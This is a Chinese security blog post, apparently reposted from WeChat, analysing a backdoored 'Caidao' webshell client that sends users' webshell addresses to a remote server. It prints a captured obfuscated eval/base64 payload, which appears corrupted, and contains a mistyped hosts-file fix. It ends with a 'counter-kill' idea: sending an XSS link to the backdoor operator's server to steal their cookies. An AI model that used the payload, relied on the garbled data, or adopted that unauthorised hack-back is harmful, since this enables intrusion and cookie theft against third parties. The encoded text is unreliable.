本文由掌控安全学院 - aj545302905 投稿 “菜刀”对于渗透测试者来说耳熟能详,但是大家用的菜刀真的安全吗?你能保证你所使用的工具不会被别人偷偷的塞入后门吗?
一.HTTP后门菜刀
我们在本地phpstudy上写一个一句话木马,并且让带有后门的菜刀去链接我们的一句话hez.php,同时对后门菜刀进行抓包。
这里我们对第四个包进行分析,因为我们在包的内容里面发现了我们一句话木马的密码后面跟了一串URL编码的数据。
hackxxx=624_23Dstrrev%28edoced_46esab829%3B%4Beva128%24_%28%24_POST%5Bz8%5D%29%29% 3B&z0=QGU2YwwoYmFZZTY8K2RRUND1NU1UWYkoweDUnN1UuMFRNFOU1TbDdjNlYwWTISdnEybGxLQ2R
NZUd SbEp5d3hLUHRBWm1sc1pTz
25hSFIwY SRudkwZzZDNKeRRTGISZ1UwMa1ZTU31.U1JMR1ZSUK5UMDFIWU1NTZGRNaWNtvUdGenN6NG5NbXRs2UNna1qxQ1BUNUFwS1R8OScpKTtAaW5pX3NIdCgizGl2cGxheW91.
nJvcnMiLCIuIik7QHN1dF9Saw1
lX2xpbw18KDAp08BzZXRFbWFnaWNFcXUudCUzX3J1bnRpbWUoNCk7ZWNobygiLT58Iik70gREPMRpcmn5hbWUOJF9TRUMRUJt
I 1NDUk1QUF9GSUxFTkFNRSJdKT
tp2igkRD89TiIp4EQ9Z61ybnF t2SgkXI1NFU1HNYnNCcigkRCwwL DEpIT@iLyIpe22vcmUh2gocnF uZ2oIkEiLc.alikgYXMNgJEwpaWoaXNYZGlyKCJ7JEOi1pKSRSL j sieyRMFToi03 8kUi4911.0l jskdT oZnUU'3Rpb25fZXhpcBRzKCdwB3HpeF9nZXR1221kJykpPBBwb3NpeF9nzXRwd30pZChacG9zaXhf2208zX0pzCgpKTonJzskdXNyPSgkdSk%
2FJHUbJ25hbWUnX
发现这里可以进行base64解码:
这里解码后我们发现还可以进行一次base64解码:
经过三次解码后,我们找到了后门的地址。
菜刀TCP后门:
对可疑网站的域名进行解析,发现对方IP为
192.126.xxx.xxx
PS:这并不是内网IP对该IP进行查询 发现对方服务器在美国
于是我们再继续往下看,发现一条HTTP数据包
从中得知对方后门地址为www.xxx.xyz/1dex.asp
所以我们尝试去访问一下:发现访问不到 但是可以正常访问对方服务器
那么我们已经知道我们的提权工具存在后门了 该怎样避免呢?
127.0.01 "后门网址"
这样我们的电脑访问后门的时候 就相当于访问本机了,致使对方后门失效。
反杀:
反杀思路:我们是不是可以构造这样一条连接
www.xxx.com?Url=<script>alert(1)</script>
中间的js语句可以构造反弹cookie的代码,这样当对方登录的时候 是不是就可以窃取到cookie了呢?当然要考虑到对方服务器上是否开启拦截 是否有安全狗等问题……申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):菜刀HTTP&TCP后门分析+防范
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论